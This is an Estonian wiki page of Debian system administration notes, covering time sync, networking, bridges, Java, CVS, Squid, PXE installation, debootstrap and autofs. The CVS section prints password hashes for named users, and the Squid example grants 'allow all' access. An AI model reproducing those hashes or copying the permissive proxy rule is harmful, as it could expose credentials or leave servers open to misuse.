127.0.0.1: stratum 3, offset -0.001927, synch distance 0.038145
192.168.30.8: stratum 2, offset -0.000066, synch distance 0.020106
192.168.30.15: stratum 1, offset 0.000010, synch distance 0.002270, refid 'GPS'

võib ka küsida sarnaselt (see väljund ei ole eelmisega näitega kooskõlas)

# ntpq -np
remote refid st t when poll reach delay offset jitter
==============================================================================
10.192.0.53 193.40.5.113 3 u 47 64 37 0.646 -22.260 73.828

====Kellaaja esitamine ja seadistamine tarkvaraga openntpd====

ntp tarkvarale on populaarne alternatiiv openntpd, üks praktiline erinevus on nt selles, et ntp sisaldab ntptrace utiliiti. OpenNTPD ei sisaldu Debian Squeeze paketihalduses.

====Märkused====

Selleks, et Xen domU kellaaega mõjutaks domU sees töötav ntp server tuleb öelda

bash# sysctl -w xen.independent_wallclock=1

või lisada faili /etc/sysctl.conf rida

xen.independent_wallclock=1

Leap sekundite käsitlemine toimub tavaliselt kahel võimalikul viisil

* lisatakse äkki sekund ära

# dmesg
..
[14255112.244045] Clock: inserting leap second 23:59:60 UTC

* määritakse sekundi lisandumine pikema perioodi peale

===Võrgu seadistamine seadistusfailidega===

Võrguseadmete seadistamine toimub faili /etc/networks/interfaces abil. Selle faili sisu alusel kehtestatakse võrguseadistused arvuti alglaadimisel või öeldes arvuti töötamisel

# /etc/init.d/networking restart

Failis saab kasutada sellised sektsioone

====lo ja eth võrguseadme seadistamine====

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.10.10
gateway 192.168.10.254
netmask 255.255.255.0

====dummy võrguseadme seadistamine====

auto dummy0
iface dummy0 inet static
address 192.168.13.251
netmask 255.255.255.0
network 192.168.13.0
broadcast 192.168.13.255

Kui on soov kasutada enam kui ühte dummy seadet, tuleb laadida dummy moodul sarnaselt

# modprobe dummy numdummies=5

VLAN kasutamist tutvustatakse punktis http://kuutorvaja.eenet.ee/wiki/VLAN_kasutamine#Linux.27i_kasutamine_mode_trunk_re.C5.BEiimis

===Silla kasutamine===

Silla (ingl. k. bridge) kasutamine toimub paketis bridge-utils utiliitidega, paigaldamiseks tuleb öelda

# apt-get install bridge-utils

Nt tekitame silla eth1 ja tap0 seadmetega

# brctl addbr br0
# brctl addif br0 eth1
# brctl addif br0 eth2

Silla omadusi saab küsida öeldes

# brctl show
bridge name bridge id STP enabled interfaces
br0 8000.00064f320035 yes eth1
eth2

Silla kasutamiseks peavad olema seadmed üleval, nt silla üles tõstmiseks tuleb öelda

# brctl br0 up

Silla saab eemaldamiseks tuleb sild alla lasta, eemaldada seadmed ning lõpuks sild

# brctl br0 down
# brctl delif br0 eth1
# brctl delif br0 eth2
# brctl delbr br0

Sillale saab seadistada ka ip aadressi, nii nagu paljudele muudele võrguseadmetele

# ifconfig br0 192.168.1.200 netmask 255.255.255.0

Tulemusena paistab

# ifconfig br0
br0 Link encap:Ethernet HWaddr 00:17:42:02:0b:8a
inet addr:192.168.1.250 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::5c63:deff:fe92:e125/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:38 errors:0 dropped:0 overruns:0 frame:0
TX packets:17 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2008 (1.9 KiB) TX bytes:3101 (3.0 KiB)

kusjuures bridge mac aadressina kasutatakse vaikimisi kõige väiksemat mac aadressi bridge külge ühendatud seadmetest, st see aadress võib muutuda bridge töötamise käigus. mac aadressi saab ka muuta, nt

# ifconfig br0 hw ether 70:01:68:00:12:50

STP (Spanning Tree Protocol) sisselülitamiseks tuleb öelda

# brctl stp br0 on

ja silla STP info esitamiseks

# brctl showstp br0
br0
bridge id 8000.00064f320035
designated root 8000.00064f320035
root port 0 path cost 0
max age 20.00 bridge max age 20.00
hello time 2.00 bridge hello time 2.00
forward delay 15.00 bridge forward delay 15.00
ageing time 300.01
hello timer 1.49 tcn timer 0.00
topology change timer 0.00 gc timer 5.49
flags

eth1 (1)
port id 8001 state disabled
designated root 8000.00064f320035 path cost 4
designated bridge 8000.00064f320035 message age timer 0.00
designated port 8001 forward delay timer 0.00
designated cost 0 hold timer 0.00
flags

eth2 (2)
port id 8002 state forwarding
designated root 8000.00064f320035 path cost 4
designated bridge 8000.00064f320035 message age timer 0.00
designated port 8002 forward delay timer 0.00
designated cost 0 hold timer 0.48
flags

kust on näha, et

* antud juhtumil on silla üks komponent välja lülitatud

Sillaga seotud mac aadresside esitamiseks tuleb öelda

# brctl showmacs br0
port no mac addr is local? ageing timer
2 00:06:4f:32:00:35 yes 0.00
1 00:06:4f:63:e3:d7 yes 0.00
2 00:0c:42:07:1a:45 no 0.04
2 00:16:3e:00:00:01 no 83.98
2 00:1c:c0:38:89:07 no 22.58
2 70:01:68:00:11:45 no 227.43
2 70:01:68:01:02:49 no 33.48

Kasulikud lisamaterjalid

* http://en.wikipedia.org/wiki/Bridging_(networking)
* http://tldp.org/HOWTO/BRIDGE-STP-HOWTO/index.html
* http://en.wikipedia.org/wiki/Spanning_tree_protocol
* http://en.wikipedia.org/wiki/LAN_switching
* http://backreference.org/2010/07/28/linux-bridge-mac-addresses-and-dynamic-ports/

===Võrgu seadistamine programmiga ip===

Programm ip võimaldab Linuxi kaasaegsetes 2.4 ja 2.6 tuumades sisalduva võrguliideste toega oluliselt paindlikumalt ümber käia
kui ifconfig. Näited käsudest, mida on ohutu anda töötavas masinas.

====Seadmed====

# ip link show
1: lo: mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:07:e9:0b:d3:26 brd ff:ff:ff:ff:ff:ff

====Seadme aadressid====

Aadresside esitamine

# ip address show eth1
3: eth1: mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:07:e9:0b:d3:d3 brd ff:ff:ff:ff:ff:ff
inet 10.0.6.5/24 brd 10.0.6.255 scope global eth1
inet 10.0.6.6/24 brd 10.0.6.255 scope global secondary eth1:1

====Ruuting====

Ruutingute esitamine

# ip route show
10.0.5.0/24 dev eth3 proto kernel scope link src 10.0.5.1
10.0.6.0/24 dev eth0 proto kernel scope link src 10.0.6.1
...

Ruutingu lisamine

# ip route add 192.168.10/24 dev eth0

Ruutingu eemaldamine

# ip route del default via 10.0.14.1 dev eth0

====Misc====

Näited kästudest, mida on ehk ohutu anda töötava masina kasutuses mitte olema võrguseadme suhtes

# ip addr add 100.100.100.4/16 dev eth4
# ip addr del 100.100.100.4/16 dev eth4

nn ifconfig'i aliased

Osade teadlaste arvates on see tänapäeval täiesti igand rääkida ethx:x aliastest. Et lihtsalt saab seadmele omistada mitu aadressi ja kogu lugu. Kui aga on juhtunud selline õnnetu lugu, et seadmel on nt eth0:1 aadress, siis saab seda eemaldada lihtsalt sedasi

# ip addr del 195.80.96.214 dev eth0

===Java kasutamine===

Java ehk JVM (Java Virtual Machine) tarkvara kasutamiseks on Debianis mitmeid võimalusi. Kui on kavatsus jääda paketihaldusest paigaldatud tarkvara kasutamise juurde, siis tõenäoliselt on otstarbekas lasta paketihaldusel töötada ja kasutada Debiani Java pakette. Kui aga kasutatakse mingit eraldiseisvat tarkvara, nt Tomcat, GlassFish vms Java rakendusserverit, siis on ehk otstarbekas kasutada http://java.sun.com/ veebikohast kopeeritud Javat.

====Java kasutamine paketihaldusest====

Debiani Lenny paketihalduses on olemas sellised Java kompilaatorit sisaldavad Java implementatsioonid

$ aptitude search "?provides(java-compiler)"
p gcj - The GNU Java compiler
p gcj-4.2 - The GNU compiler for Java(TM)
p gcj-4.3 - The GNU compiler for Java(TM)
p jikes-classpath - clean room standard Java libraries - wrapper for jikes
p jikes-kaffe - Wrapper for jikes using Kaffe classes
p kaffe-jthreads - A green threads enabled version of the Kaffe VM
p kaffe-pthreads - A POSIX threads enabled version of the Kaffe VM
p sun-java5-jdk - Sun Java(TM) Development Kit (JDK) 5.0
p sun-java6-jdk - Sun Java(TM) Development Kit (JDK) 6

Tarkvara paigaldatakse nagu ikka Debiani pakett ning kasutatakse nagu ikka Javat.

====Sun Java kasutamine====

Sun on Java autor ja üks oluline edasiarendaja, kuid on ka teisi Java implementatsioone. Sun Java saab kasutaja kopeerida aadressilt http://java.sun.com/ kus saab tutvuda ka Java kasutustingimustega.

Sun jagab Javat üsna erinevates pakendustes, kusjuures erinevus on kolmel nö teljel

* millisele funktsionaalsusele on orieteeritud - SE (Standard Edition), EE (Enterprise Edition), ME (Micro Edition)
* kas tegu on arendusvahendi või nö kasutusvahendiga - nt SDK (Software development kit) vs JRE (Java Runtime Environment), viimane sisaldub esimeses
* versiooninumber

Erinevad versioonid 2009 suve seisuga

* 1.3 - vana versioon, mida kasutavad ehk vaid mõned nö riistvaras javat sisaldavad seadmed
* 1.4 - mõned nö legacy rakendustega Tomcat rakendusserverid võiksid seda veel kasutada
* 5 (vahel nimetatakse 1.5) - täiesti veel kasutuses, mõnda rakendust soovitatakse kasutada sellel versioonil
* 6 (vahel nimetatakse 1.6) - viimane stabiilne versioon

Tundub, et juhtumil kui ei ole teada millist Javat kasutada, siis on sobiv valida SE SDK versioon 1.6, mille saab kopeerida http://java.sun.com/ veebikohast liikudes

Downloads -> Java SE -> Java SE Development Kit (JDK 6 Update 16) -> Download

ning täpsustada platvorm, nt

* Linux64 - 64 bit Linux
* Linux - 32 bit Linux

Seejärel valida nimekirjast .bin

File Description Name Size
Java SE Development Kit 6u16 jdk-6u16-linux-x64-rpm.bin 74.04 MB
Java SE Development Kit 6u16 jdk-6u16-linux-x64.bin 78.08 MB

Kasutamiseks tuleb otsustada, millises kataloogis JVM asuma hakkab, olgu see nt /usr/local/java6, selleks tuleb minna juurkasutajana kataloogi /usr/local

# cd /usr/local
# sh jdk-6u16-linux-x64.bin
vastata küsimustele jaatavalt
# ln -s /usr/local/tekkinud-katalooginimi /usr/local/java6

Java kasutamiseks tuleb seada ja kui peetakse vajalikuks, lisada teele

$ export JAVA_HOME=/usr/local/java6
$ export PATH=/usr/local/java6/bin:$PATH

Seejärel saab nt küsida Java versiooni öeldes

$ /usr/local/java6/bin/java -version
java version "1.6.0_16"
Java(TM) SE Runtime Environment (build 1.6.0_16-b01)
Java HotSpot(TM) 64-Bit Server VM (build 11.3-b02, mixed mode)

====Iceweaseli Java lisa====

Iceweaseli ehk Firefox 3.x versiooniga java kasutamiseks on i386 keskkonnas olemas plugin

# apt-get install sun-java5-plugin

või

# apt-get install sun-java6-plugin

===Lokaat===

Lokaatide kasutamiseks tuleb paigalda pakett locales

# apt-get install locales

ning edasiseks seadistamiseks saab öelda, asjakohased seadistusfailid on iseenesest /etc/environment ning /etc/default/locale

# dpkg-reconfigure locales

Süsteemi vaikelokaat võiks olla ehk C serverite puhul, aga see on kasutaja otsustada kuidas ta paremaks peab.

Lokaatide nimekirja esitamiseks tuleb öelda, nt selline võiks olla üsna tüüpiline tulemus

# locale -a
C
POSIX
et_EE.utf8

Kui seadistada lisaks nt ru_RU.utf8 ja fr_FR.utf8, siis saab lugeda vene ja prantsuse keelseid manuaale. Nt öeldes nö tavalises xtermis

$ export LANG=fr_FR.utf8
$ uxterm

mis paistab selline

[[Pilt:Os-debian-kasutamine-1.gif]]

Lisaks töötab nt w3m ja lynx uxterm aknas vene keeles.

===CD plaadi kirjutamine===

Niisama plaadile kirjutamiseks tuleb esmalt moodustada failidest tõmmis öeldes näiteks

# genisoimage -o ../tommis.iso .

ning seejärel kopeerida tõmmis plaadile öeldes

# cdrecord -v speed=10 dev=/dev/cdrom tommis.iso

Kui tegu on RW plaadiga, siis ennem järgmist kirjutamist tuleb plaat puhastada käsuga

# cdrecord -v dev=/dev/cdrom blank=fast

Squeeze puhul

# apt-get install wodim
# wodim -v speed=8 dev=/dev/sr0 tommis.iso

korduvkirjutatava plaadi kustutamiseks

# wodim -v dev=/dev/cdrom blank=fast

===Klaviatuuriasetus konsoolil===

Klaviatuuriasetuse muutmiseks tuleb öelda

# dpkg-reconfigure console-data

ning valida sobiv asetus. NB! Ka mac'i asetus on olemas.

===OpenSSL probleem===

2008 aasta kevadel ilmnes, et Debiani arendajad olid OpenSSL tarkvara pakendamisel tekitanud avalike võtmete genereerimist puudutavas osas vea, mille tõttu osa varasemalt Debian Etch abil tekitatud võtmeid ja sertifikaate on ärakasutatavad. Kas konkreetne sertifikaat on haavatav saab kontrollida programmiga openssl-vulnkey. Esmalt tuleb paigaldada Backportsidest pakett openssl-blacklist ning öelda

# cat sertifikaat.pem | openssl-vulnkey -
COMPROMISED: b3409bf40c63d0d8fc3e1625e9cac2076e20d1e7 -

===Helikaardi kastumine===

Kui helikaart on arvutisse füüsiliselt paigaldatud, siis vajadusel saab SoX tarkvara utiliitide abil kontrollida, kas heli salvestamine mikrofoni abil ja heli taasesitamine töötavad.

Sox tarkvara paigaldamiseks tuleb öelda

# apt-get install sox

Salvestamiseks sobib öelda

# rec -t .wav /tmp/failinimi.wav

Taasesitamiseks sobib öelda

# play /tmp/failinimi.wav

Lisaks on asjakohane kasutada mikserit, nt aumix või alsamixer, just mikrofoni sisselülitamiseks, käivitades xtermi aknas võiks paista selline pilt, vajadusel käivitamisel näidata seadme number, nt

# alsamixer -c 1

[[Pilt:Alsamixer-1.gif]]

kus

* F6 abil saab valida helikaarti, sh virtuaalset (PulseAudio)

===Digifotokaamera kasutamine===

Tänapäeval on levinud nn digitaalsed fotokaamerad, mida saab ühendada arvutiga USB liidese abil selleks, et kopeerida arvutisse fotoaparaadi flash diskile salvestatud pildid. Üks populaarne tarkvara, mis võimaldab suhelda fotokaameraga on gphoto2 http://gphoto.sourceforge.net/.

Tarkvara paigaldamiseks tuleb öelda

# apt-get install gphoto2

Graafiline nö pealisehitus gphoto2 tarkvarale on gtkam, mille paigaldamiseks tuleb öelda

# apt-get install gtkam

Piltide kopeerimiseks tuleb kaamera ühendada arvutiga ning lülitada piltide kopeerimise režiimile, operatsioonisüsteem peaks seejärel USB seadme ära tundma

# lsusb
...
Bus 001 Device 006: ID 04a9:309a Canon, Inc. PowerShot A80
Bus 001 Device 001: ID 0000:0000

Peale gtkam programmi käivitamist peaks gtkam suutma avastada kaamera ning esitama sarnase kasutajaliidese

[[Pilt:Gtkam-1.gif]]

gphoto2 programmi abil saab kaamerat otsekohesemalt juhtida, aga eeldusel, et gtkam või mõni muu programm seda ei kasuta. Nt saab küsida kaamera kohta kokkuvõtet öeldes

# gphoto2 --summary
Camera summary:
Model: Canon PowerShot A80
device version: 01.0001
serial number: (null)
Vendor extension ID: 0x0000000b
Vendor extension description: (null)
...

või kopeerida kõik failid kaamerast failisüsteemi käesolevasse kataloogi

# gphoto2 --get-all-files
Downloading 'IMG_3601.JPG' from folder '/store_00010001/DCIM/236CANON'...
Saving file as IMG_3601.JPG
Downloading 'IMG_3602.JPG' from folder '/store_00010001/DCIM/236CANON'...
Saving file as IMG_3602.JPG
..

Android telefonist vms seadmest kopeerimisel on praktiline näidata kataloog, nt Google Nexus 5 nutitelefon puhul

$ gphoto2 --get-all-files -f /store_00010001/DCIM/Camera

Sony Xperia tahvelarvutiga

$ gphoto2 --get-all-files -f /store_00010001/DCIM/100ANDRO

Kui seadme ühendamise ta nö mountitakse, siis võib olla vajalik ta File Manager programmis vms kohal lahti lasta.

===SSH kasutamine===

Kui Debian on juhtumisi paigaldatud Networkless siis puudub vaikimisi openssh-server, selle paigaldamiseks tuleb öelda käsk

# apt-get install openssh-server

Mille järel starditakse server ka automaatselt, kasutaja mureks on vaid sisse logida.

Kui Debian Lenny ssh kliendiga sisselogimine teistesse süsteemidesse on muutunud rahulikuks (nt vana RedHat 4 ES või Solaris 10 ssh serverid oma default väärtustega) ning -v võtmega käivitatud klient ütleb muu seas

debug1: Authentications that can continue: gssapi-keyex,\
gssapi-with-mic,publickey,password,keyboard-interactive
debug1: Next authentication method: gssapi-keyex
debug1: No valid Key exchange context
debug1: Next authentication method: gssapi-with-mic
debug1: Unspecified GSS failure. Minor code may provide more information
No credentials cache found

debug1: Unspecified GSS failure. Minor code may provide more information
No credentials cache found

siis aitab kliendi seadistusfailis, nt /etc/ssh/ssh_config kasutada selliselt seadistatud parameetrit

GSSAPIAuthentication no

===Veebikaamera kasutamine===

Veebikaamera on väike videokaamera, mis tavaliselt ühendatakse arvutiga USB abil ning teda sobib kasutada nt Skype programmi juures enda visuaalseks reaalajas esitlemiseks.

Veebikaamera kasutamise ettevalmistamisel peab peale kaamera arvutiga ühendamist ilmuma USB seadmete nimekirja uus seade, midagi sellist

# lsusb
..
Bus 001 Device 003: ID 046d:092e Logitech, Inc. QuickCam Chat

Selle spca5xx chipsetiga Logitechi QuickCam Chat veebikaamera kasutamiseks tuleb paigaldada Lennile vastav draiver valides sobiva, st oma tuuma platvormile sobiva tuumamooduli, nt

# apt-get install gspca-modules-2.6-686

Lisaks peab see kasutaja, kelle alt Skype programm töötab kuuluma video gruppi, vajadusel tuleb redigeeerida /etc/group faili

# grep video /etc/group
video:x:44:kasutajanimi

Kui kasutaja määrati gruppi kuuluma, siis tuleb korraks süsteemist logida välja ja tagasi sisse, et gruppikuuluvus kehtestuks. Valides seejärel Skype programmi Options peaks olema kaamera kasutamise võimalus olemas

[[Pilt:Veebikaamera-1.gif]]

Veebikaamerat oskavad kasutada lisaks mitmed muud programmid, nt Cheese (gnome komponent), Gqcam.

===Mälukaartide kasutamine===

Nn mälukäärte esineb külluses, need mis ühendatakse arvutile külge USB liidese kaudu, kas otse või nö lugeja abil paistavad operatsioonisüsteemile tavaliselt SCSI seadmena. Seega, kasutamiseks tavaliselt piisab teha kindlaks dmesg väljundi lõpust millise nimega /dev/sdx seade on juurde tekkinud ning monteerida seejärel ta külge, nt

# mount /dev/sdc1 /mnt/malukaart

===Squid v. 3 kasutamine===

Lenny paketihaldusest saab paigaldada Squid v. 3 tarkvara öeldes

# apt-get install squid3

====Kasutamine kiirendina====

Squid3 kiirendina kasutamiseks sobib kasutada sellist seadistusfaili

cache_dir ufs /var/spool/squid3 768 16 256
http_port 10.0.6.249:80 defaultsite=www.siseministeerium.ee vhost
icp_port 0

cache_peer 10.0.6.95 parent 80 0 no-query originserver name=www100695 login=PASS
acl sites_www_100695 dstdomain src "/etc/squid3/sites_www100695.txt"
cache_peer_access www100695 allow sites_www_100695

cache_peer 10.0.6.96 parent 80 0 no-query originserver name=www100696 login=PASS
acl sites_www_100696 dstdomain src "/etc/squid3/sites_www100696.txt"
cache_peer_access www100696 allow sites_www_100696

acl all src 0.0.0.0/0.0.0.0
acl localhost src 127.0.0.1/255.255.255.255 10.0.0.0/255.255.255.0
acl Safe_ports port 80 # http

http_access deny !Safe_ports
http_access allow all

access_log /var/log/squid3/access.log squid
emulate_httpd_log on

===locate andmebaas===

Vaikimisi moodustab Debian updatedb programmi käivitamisel cron'ist nn locate andmebaasi, milles sisaduvad süsteemis leiduvate failid nimed. Seda andmebaasi saab kasutada nt selliselt

# locate .bash_history
/root/.bash_history
/srv/backup/500g-vint/home/mart/.bash_history

locate andmebaas võib osutuda mitmel juhul ebasoovitavaks

* andmebaasi salvestatakse andmed, mis seal ei peaks sisalduma; nt kui veebiserveri kasutajana saab käivitada programme, siis annab see baas ilmselt soovimatut lisainfot kasutajale ühe või teise faili olemasolust ja asukohast failisüsteemis
* locale andmebaasi moodustatakse väga suure mahuga andmetest iga päev uuesti ning see raiskab ilmselt ressurssi

updatedb programm käivitatakse skripti

/etc/cron.daily/mlocate

abil ning updatedb tööd saab kontrollida seadistusfaili abil, eriti, milliseid katalooge andmebaasi koostamisel kasutatakse

/etc/updatedb.conf

===Operatsioonisüsteemi paigaldamine võrgust===

Operatsioonisüsteemi võrgust paigaldamine eeldab arusaadavalt paigaldamise ajal võrguühenduse olemasolu, soovitavalt nö hea ühenduse olemasolu. Debian Lenny operatsioonisüsteemi saab paigaldada võrgust kolmel viisil

* business card CD tõmmis (ca 40 MB) - sisaldab tuuma ja installerit
* minimaalse sisu CD tõmmis (ca 180 MB) - sisaldab tuuma, installerit ning minimaalset hulka pakette
* TFTP serverilt paigaldamine - tuuma ja ramdisk booditakse TFTP serverilt

Vaatamata sellele kui palju kasutati kohalikku abi, st lokaalset meediat või TFTP serverit toimub süsteemi mahukama osa moodustava tarkvara kopeerimine paigaldamise ajal võrgust.

Võrgust paigaldamine võiks eriti sobida üle IBM IMM ja HP iLO liideste tarvkara paigaldamisel.

====Paigaldamine TFTP serverilt====

Üks võimalus Debiani paigaldada on täiesti ilma lokaalse meediate st võrgust, kuid eeldusel, et arvuti omab PXE võimelist võrgukaarti.

Selleks tuleb kopeerida aadressilt tftp serveris kasutamiseks ettevalmistatud kataloogi sisu

# wget -np -r http://ftp.nl.debian.org/debian/dists/lenny/main/installer-i386/current/images/netboot/debian-installer/i386/

ning paigutada lokaalvõrgus asuvasse tftp serverisse, nt kataloogi /tftpbood

# find /tftpboot
/tftpboot
/tftpboot/debian-installer
/tftpboot/debian-installer/i386
/tftpboot/debian-installer/i386/boot-screens
/tftpboot/debian-installer/i386/boot-screens/exithelp.cfg
/tftpboot/debian-installer/i386/boot-screens/adtxt.cfg
/tftpboot/debian-installer/i386/boot-screens/index.html
/tftpboot/debian-installer/i386/boot-screens/f1.txt
/tftpboot/debian-installer/i386/boot-screens/f10.txt
/tftpboot/debian-installer/i386/boot-screens/f2.txt
/tftpboot/debian-installer/i386/boot-screens/f3.txt
/tftpboot/debian-installer/i386/boot-screens/f4.txt
/tftpboot/debian-installer/i386/boot-screens/f5.txt
/tftpboot/debian-installer/i386/boot-screens/f6.txt
/tftpboot/debian-installer/i386/boot-screens/f7.txt
/tftpboot/debian-installer/i386/boot-screens/f8.txt
/tftpboot/debian-installer/i386/boot-screens/f9.txt
/tftpboot/debian-installer/i386/boot-screens/syslinux.cfg
/tftpboot/debian-installer/i386/boot-screens/menu.cfg
/tftpboot/debian-installer/i386/boot-screens/prompt.cfg
/tftpboot/debian-installer/i386/boot-screens/splash.png
/tftpboot/debian-installer/i386/boot-screens/stdmenu.cfg
/tftpboot/debian-installer/i386/boot-screens/vesamenu.c32
/tftpboot/debian-installer/i386/boot-screens/txt.cfg
/tftpboot/debian-installer/i386/index.html
/tftpboot/debian-installer/i386/initrd.gz
/tftpboot/debian-installer/i386/linux
/tftpboot/pxelinux.0
/tftpboot/pxelinux.cfg
/tftpboot/pxelinux.cfg/index.html
/tftpboot/pxelinux.cfg/default

Lisaks tuleb valmistada ette sobivalt dchp server, nt sellise host kirjeldusega, next-server 192.168.1.254 on tftpd server

host fuji.auul {
hardware ethernet 00:17:42:02:0b:8a;
fixed-address 192.168.1.142;
option broadcast-address 192.168.1.255;
option routers 192.168.1.254;
filename "pxelinux.0";
next-server 192.168.1.254;
option domain-name-servers 192.168.1.254;
}

Tulemusena peab installeeritav arvuti saama dhcp serverilt omale võrguseaded, alglaadima tftp serverilt operatsioonisüsteemi ning käivitama installeri. Edasine paigaldamine toimub tavapärasel viisil, kusjuures installer küsib Debiani peegel-serveri asukohta, millelt kopeeritakse tarkvara.

===CVS tarkvara kasutamine===

CVS tarkvara saab kasutada mitmel moel, antud juhul on tegemist selliste asjaoludega

* CVS töötab nn pserver rezhiimis, mis tähendab, et teenus kuulab 2401 pordil ja liiklus on krüptimata
* CVS liiklust tuleb täiendavate CVS väliste vahenditega turvata, nt OpenVPN või Stunnel
* CVS tarkvara tegeleb ise oma kasutajatega, st operatsioonisüsteemi kasutajatest eraldi
* saab kasutada mitmeid hoidlaid (ingl. k. repository)
* failisüsteemi kasutamine hoidla operatsioonisüsteemi seisukohalt toimub iga hoidla puhul hoidlale vastava kasutajaga (mitte hoidlat kasutava cvs kasutajana)

Antud juhul kasutatakse mitmeid Debiani haldajate poolt nn vanilla CVS tarkvarale juurde lisatud täiendusi, mille kasutamist on kirjeldatud failis /usr/share/doc/cvs/README.Debian.gz.

Paigaldamiseks tuleb öelda

# apt-get install cvs

ning valida kas kasutatakse pserverit või mitte, antud juhul kasutatakse ja seejuures tuleb järgnevalt määrata, millistes kataloogides asuvad repositooriumid, nt

/srv/cvs-loomaaed
/srv/cvs-propaganda

CVS tarkvara juhivad serveri poolel sellised seadistusfaili

* CVS p-serveri seadistusfailis /etc/cvs-pserver.conf sisalduvad muu seas repositooriumide asukohad failisüsteemis ning kasutate paroolifail

CVS_PSERV_REPOS="/data/cvs-loomaaed:/data/cvs-propaganda"
CVS_PSERV_LIMIT_MEM=hard
CVS_PSERV_LIMIT_DATA=hard
CVS_PSERV_LIMIT_CORE=0
CVS_PSERV_LIMIT_CPU=hard
CVS_EXT_PASSWD_FILE=/etc/cvs-passwd

* inetd või xinetd kasutamisel vastavalt seadistusfailis /etc/inetd.conf peab sisalduma rida

cvspserver stream tcp nowait root /usr/sbin/tcpd /usr/sbin/cvs-pserver

või fail /etc/xinetd.d/cvs sisuga

service cvspserver
{
disable = no
socket_type = stream
protocol = tcp
wait = no
user = root
server = /usr/sbin/cvs-pserver
}

* repostitooriumide failide omanikud ja efektiivsed kasutajad failis on kirjeldatud /etc/cvs-repouids

/srv/cvs-loomaaed:cvs-loomaaed
/srv/cvs-propaganda:cvs-propaganda

Repositooriumide initsialiseerimiseks tuleb öelda

# su - cvs-loomaaed
$ cvs -d /srv/cvs-loomaaed init
# su - cvs-propaganda
$ cvs -d /srv/cvs-propaganda init

Paroolifaili /etc/cvs-passwd formaat on selline

/data/cvs-loomaaed
mart:CHHLHZezIWZZQ
priit:KbHgWDSglIOH.
/data/cvs-propaganda
mart:CHHLHZezIWZZQ
priit:KbHgWDSglIOH.

Projektid tuleb alguses hoidlasse importida vastavate kasutajatega

# su - cvs-loomaaed
$ cd /data/tmp/portaal-arendus
cvs-loomaaed$ cvs -d /data/cvs-loomaaed import -m "Loomaaia portaali arendus algab" portaal-arendus vt rt
# su - cvs-propaganada
$ cd /data/tmp/portaal-propaganda
cvs-propaganda$ cvs -d /data/cvs-propaganda import -m "Loomaaia propaganda algab" propaganada vt rt

====Moodulite kirjeldamine====

CVS all olevast projektist saab kopeerida ka üksikuid katalooge öeldes

$ cvs co projektinimi/katalooginimi

====Kasutamine Linuxi CVS kliendiga====

$ export CVSROOT=:pserver:kasutajanimi@cvs.loomaaed.tartu.ee:/data/cvs-loomaaed
$ cvs login
$ cvs co portaal-arendus
$ cvs logout

====Kasutamine Windowsi TortoiseCVS kliendiga====

[[Pilt:Tortoisecvs-1.gif]]

===Riistvara omadustega tegelevad utiliidid===

* lshw - esitab suhteliselt põhjaliku väljundi arvutisüsteemi riistvaralistest komponentidest, nt sellise

# apt-get install lshw

* ethtool

# apt-get install ethtool

===Debootstrap programmi kasutamine===

debootstrap programmiga saab näidatud kataloogi moodustada operatsioonisteemi juurfailisüsteemi

# debootstrap lenny /srv/lenny-chroot http://ftp.aso.ee/debian

Nt sobib seda kasutada töötava operatsioonisüsteemi sees olles multiboot arvuti moodustamiseks. Sel juhul tuleb Debian Lenny puhul lisaks tähele panna selliseid asjaolusid peale seda kui debootstrap on töö lõpetanud

* moodustada /etc/fstab sisu
* seadistada /etc/network/interfaces ja /etc/hosts
* kopeerida /lib/modules alla tuuma moodulid
* paigaldada udev, lvm2, vlan, firmware-bnx2, bridge-utils ja openssh-server tarkvara (ja muu oluline)
* kirjutada /etc/shadow faili juurkasutajale parool (konsoolilt saab küll login: root järel enterit öeldes sisse ka ilma paroolita)
* kopeerida tuum ja iniramfs /boot kataloogi
* paigaldada alglaadur (nt grub-install abil)
* seadistada ajavöönd, /etc/localtime link

Kui selliselt moodustatud keskkonda chrootida, siis üldiselt peaks olema eelnevalt ühendatud külge sellised failisüsteemid, eeldusel, et keskkond asub kataloogis /target

/dev/sda1 on /target/boot type ext3 (rw,noatime,errors=continue,data=ordered)
proc on /target/proc type proc (rw)
sysfs on /target/sys type sysfs (rw)
udev on /target/dev type tmpfs (rw,size=10240k,mode=755)
devpts on /target/dev/pts type devpts (rw,mode=600)

öeldes

# mount -t proc /proc /srv/lenny-32/proc
# mount -t devpts devpts /srv/lenny-32/dev/pts

debootstrap abil saab tekitada ka teisele arhitektuurile vastav failisüsteem, nt öeldes amd64 keskkonnas

# debootstrap --arch=i386 lenny /srv/lenny-32 http://ftp.aso.ee/debian

Uuemal ajal soovitatakse kasutada tarkvara multistrap.

===Autofs===

Selleks, et failisüsteem monteeritaks külge automaatselt vastava ühenduspunkti poole pöördumisel, sobib kasutada tarkvara autofs. Tarkvara paigaldamiseks tuleb öelda

# apt-get install autofs

Tarkvara kasutamiseks tuleb näidata seadistusfailis /etc/auto.master nn map failide asukohad, nt

# cat /etc/auto.master
/var/autofs /etc/auto.misc --timeout=60

kusjuures map failis /etc/auto.misc on kirjeldatud konkreetsed ressursid, nt

# cat /etc/auto.misc
cd -fstype=iso9660,ro,nosuid,nodev :/dev/cdrom
removable -fstype=ext3,ro :/dev/mapper/mpath3

Kui nüüd öelda muidu tühjas kataloogis /var/autofs 'ls -l', siis ühendatakse failisüsteem külge ning seejärel täidetakse ls käsk, nt

# cd /var/autofs/removable
drwx------ 2 root root 16384 Apr 11 14:13 lost+found

Ühendatud failisüsteemide parameetreid näeb nii

# mount | grep autofs
automount(pid7544) on /var/autofs type autofs (rw,fd=4,pgrp=7544,minproto=2,maxproto=4)
/dev/mapper/mpath3 on /var/autofs/removable type ext3 (ro)

Autofs olekut näeb öeldes

# /etc/init.d/autofs status
Configured Mount Points:
------------------------
/usr/sbin/automount --timeout=300 /home file /etc/auto.home

Active Mount Points:
--------------------
/usr/sbin/automount --pid-file=/var/run/autofs/_home.pid --timeout=300 /home file /etc/auto.home

====NFS ressursi ühendamine====

Nt kasutajate kodukataloogide üle NFS ühendamiseks tuleb kirjeldada nt selline /etc/auto.home fail

# cat /etc/auto.home
